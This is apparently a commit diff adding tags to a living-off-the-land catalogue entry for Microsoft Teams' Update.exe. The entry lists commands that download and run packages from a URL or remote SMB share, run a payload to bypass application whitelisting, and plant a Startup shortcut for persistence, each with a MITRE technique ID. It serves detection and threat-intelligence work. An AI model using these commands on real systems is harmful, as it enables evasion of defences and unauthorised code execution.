Update Update.yml Tags

Added Tags: Execute Nuget Execute Remote Execute EXE
2024-12-28 15:58:24 +01:00 · 2024-10-13 22:35:45 +02:00 · 2024-10-13 22:35:45 +02:00 · 927189f01e
commit 927189f01e
parent ce9d4e59f5
1 changed files with 33 additions and 0 deletions
--- a/yml/OtherMSBinaries/Update.yml
+++ b/yml/OtherMSBinaries/Update.yml
@ -18,6 +18,9 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+    Tags:
+      - Execute: Nuget
+      - Execute: Remote
  - Command: Update.exe --update=[url to package]
    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
    Usecase: Download and execute binary
@ -25,6 +28,9 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+    Tags:
+      - Execute: Nuget
+      - Execute: Remote
  - Command: Update.exe --update=\\remoteserver\payloadFolder
    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
    Usecase: Download and execute binary
@ -32,6 +38,9 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+    Tags:
+      - Execute: Nuget
+      - Execute: Remote
  - Command: Update.exe --update=\\remoteserver\payloadFolder
    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
    Usecase: Download and execute binary
@ -39,6 +48,9 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+    Tags:
+      - Execute: Nuget
+      - Execute: Remote
  - Command: Update.exe --updateRollback=[url to package]
    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
    Usecase: Download and execute binary
@ -46,6 +58,9 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+    Tags:
+      - Execute: Nuget
+      - Execute: Remote
  - Command: Update.exe --updateRollback=[url to package]
    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
    Usecase: Download and execute binary
@ -53,6 +68,9 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+    Tags:
+      - Execute: Nuget
+      - Execute: Remote
  - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
    Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
    Usecase: Application Whitelisting Bypass
@ -60,6 +78,9 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+    Tags:
+      - Execute: Nuget
+      - Execute: Remote
  - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
    Usecase: Download and execute binary
@ -67,6 +88,9 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+    Tags:
+      - Execute: Nuget
+      - Execute: Remote
  - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
    Usecase: Download and execute binary
@ -74,6 +98,9 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+    Tags:
+      - Execute: Nuget
+      - Execute: Remote
  - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
    Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
    Usecase: Execute binary
@ -81,6 +108,8 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+    Tags:
+      - Execute: EXE
  - Command: Update.exe --createShortcut=payload.exe -l=Startup
    Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
    Usecase: Execute binary
@ -88,6 +117,8 @@ Commands:
    Privileges: User
    MitreID: T1547
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+    Tags:
+      - Execute: EXE
  - Command: Update.exe --removeShortcut=payload.exe -l=Startup
    Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
    Usecase: Execute binary
@ -95,6 +126,8 @@ Commands:
    Privileges: User
    MitreID: T1070
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+    Tags:
+      - Execute: EXE
 Full_Path:
  - Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\update.exe'
 Code_Sample: